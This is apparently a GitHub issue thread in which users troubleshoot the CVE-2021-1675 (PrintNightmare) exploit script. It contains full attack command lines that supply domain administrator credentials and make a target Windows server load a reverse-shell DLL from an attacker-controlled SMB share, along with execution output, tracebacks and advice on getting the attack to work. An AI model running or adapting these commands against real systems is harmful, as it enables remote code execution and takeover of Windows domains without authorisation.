
Trouble running exploit about cve-2021-1675

cube0x0 commented on June 15, 2024
Trouble running exploit

from cve-2021-1675.

Comments (13)

rahultalekar commented on June 15, 2024

Can you show your command, @mrh3r000?

mrh3r000 commented on June 15, 2024

This is my command.

──(root💀kali)-[/tmp]
└─# python3 CVE-2021-1675.py  se1300340/Administrator:Admin@[email protected] '\\192.168.40.155\smb\shell-cmd.dll'  

@rahultalekar

rahultalekar commented on June 15, 2024

What is se1300340? Is it the DC name or the NetBIOS name? On which Windows are you trying this?

mrh3r000 commented on June 15, 2024

se1300340 is the domain name of the server. I execute in tmp windows.

rahultalekar commented on June 15, 2024

So it's the DC? Which Windows 19? And which Samba server do you use to host the DLL payload? Is it SMB3?

mrh3r000 commented on June 15, 2024

I use smb3 to save payload. I don't understand where "/impacket$ ./CVE-2021-1675.py domain.local/dummy:[email protected] '\10.1.1.10\smb\shell-cmd.dll' " (this is the manual file from another source). This step I perform mining in windows tmp or impacket?

rahultalekar commented on June 15, 2024

#19 follow this

you have to use impacket.

mrh3r000 commented on June 15, 2024

Thank you senior. I will try again. ^_^ @rahultalekar

mrh3r000 commented on June 15, 2024

Hey bro, @rahultalekar.

I have a new problem. Please help me. T_T

┌──(root💀kali)-[~/CVE-2021-1675]
└─# python3 CVE-2021-1675.py se130034/Administrator:Admin@[email protected] '\\192.168.40.155>\smb\rev.dll'

[*] Connecting to ncacn_np:192.168.40.195[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_64a5c2d136933c8f\Amd64\UNIDRV.DLL
[*] Executing \\192.168.40.155>\smb\rev.dll
[*] Try 1...
Traceback (most recent call last):
  File "/root/CVE-2021-1675/CVE-2021-1675.py", line 176, in <module>
    main(dce, pDriverPath, options.share)
  File "/root/CVE-2021-1675/CVE-2021-1675.py", line 84, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x35 - ERROR_BAD_NETPATH - The network path was not found.

rahultalekar commented on June 15, 2024

@mrh3r000 your command is wrong; remove > from \192.168.40.155> and then run again.

aaminin commented on June 15, 2024

try this:
python3 CVE-2021-1675.py se1300340/Administrator:'Admin@123'@192.168.40.195 '\192.168.40.155\smb\shell-cmd.dll

mrh3r000 commented on June 15, 2024

@rahultalekar
So that's the fault. Don't know if there is a py file error?

┌──(root💀kali)-[~/CVE-2021-1675]
└─# python3 CVE-2021-1675.py se130034/Administrator:'Admin@123'@192.168.40.195 '\\192.168.40.155\smb\rev.dll'        1 ⨯
[*] Connecting to ncacn_np:192.168.40.195[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_64a5c2d136933c8f\Amd64\UNIDRV.DLL
[*] Executing \\192.168.40.155\smb\rev.dll
[*] Try 1...
Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 983, in non_polling_read
    received = self._sock.recv(bytes_left)
socket.timeout: timed out

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/root/CVE-2021-1675/CVE-2021-1675.py", line 176, in <module>
    main(dce, pDriverPath, options.share)
  File "/root/CVE-2021-1675/CVE-2021-1675.py", line 84, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 857, in request
    answer = self.recv()
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1308, in recv
    response_data = self._transport.recv(forceRecv, count=MSRPCRespHeader._SIZE)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 547, in recv
    return self.__smb_connection.readFile(self.__tid, self.__handle)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 597, in readFile
    bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1975, in read_andx
    return self.read(tid, fid, offset, max_size, wait_answer)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1310, in read
    ans = self.recvSMB(packetID)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 454, in recvSMB
    data = self._NetBIOSSession.recv_packet(self._timeout)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 914, in recv_packet
    data = self.__read(timeout)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 1001, in __read
    data = self.read_function(4, timeout)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 985, in non_polling_read
    raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.

SumenjakZiga commented on June 15, 2024

If you still can't run it, try a password without '@'. He is filtering out '@' in the PoC code, at least I think so.
